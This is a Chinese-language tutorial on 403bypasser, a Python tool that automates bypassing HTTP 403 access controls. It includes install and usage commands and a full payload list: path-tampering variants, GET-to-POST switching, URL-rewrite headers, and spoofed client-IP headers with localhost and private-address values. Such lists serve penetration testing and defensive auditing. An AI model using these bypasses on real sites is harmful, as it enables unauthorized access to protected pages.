如何使用403bypasser绕过目标页面上的访问控制限制

关于403bypasser

403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。403bypasser项目目前仍处于积极开发阶段,并且还会增加新的功能。

该工具基于Python语言开发,因此具备良好的跨平台特性。

工具安装

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/yunemse48/403bypasser.git

接下来,运行下列命令安装好该工具所需的依赖模块:

pip install -r requirements.txt

此时,403bypasser已完成安装。

工具参数

参数 描述 样例 Note
-u single URL to scan http://example.comor http://example.com/ 指定目标页面的URL地址
-U path to list of URLs ./urllist.txt, ../../urllist.txt等等 指定目标页面URL列表文件的地址
-d single directory to scan Admin 或/admin 或admin/ 或/admin/ 指定需要扫描的目标目录
-D path to list of directories ./dirlist.txt, ../../dirlist.txt等等 指定需要扫描的目标目录列表文件

工具使用

使用样例1

python3 403bypasser.py -u https://example.com -d /secret

使用样例2

python3 403bypasser.py -u https://example.com -D dirlist.txt

使用样例3

python3 403bypasser.py -U urllist.txt -d /secret

使用样例4

python3 403bypasser.py -U urllist.txt -D dirlist.txt

注意事项:下面给出的例子中,不同斜杠使用的结果都是一样的,你可以选择自己喜欢的方式:

python3 403bypasser.py -u https://example.com -d secret

python3 403bypasser.py -u https://example.com -d /secret

python3 403bypasser.py -u https://example.com -d /secret/

python3 403bypasser.py -u https://example.com -d secret/

python3 403bypasser.py -u https://example.com/ -d secret

该工具支持的功能

请求方法篡改

将GET请求转换为POST请求

路径篡改

/%2e/secret

/secret/

/secret..;/

/secret/..;/

/secret%20

/secret%09

/secret%00

/secret.json

/secret.css

/secret.html

/secret?

/secret??

/secret???

/secret?testparam

/secret#

/secret#test

/secret/.

//secret//

/./secret/./

通过非标准Header重写目标URL

X-Original-URL: /secret

X-Rewrite-URL: /secret

其他Header&值

Header:

X-Custom-IP-Authorization

X-Forwarded-For

X-Forward-For

X-Remote-IP

X-Originating-IP

X-Remote-Addr

X-Client-IP

X-Real-IP

值:

localhost

localhost:80

localhost:443

127.0.0.1

127.0.0.1:80

127.0.0.1:443

2130706433

0x7F000001

0177.0000.0000.0001

0

127.1

10.0.0.0

10.0.0.1

172.16.0.0

172.16.0.1

192.168.1.0

192.168.1.1

工具运行截图

项目地址

403bypasser:GitHub传送门

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发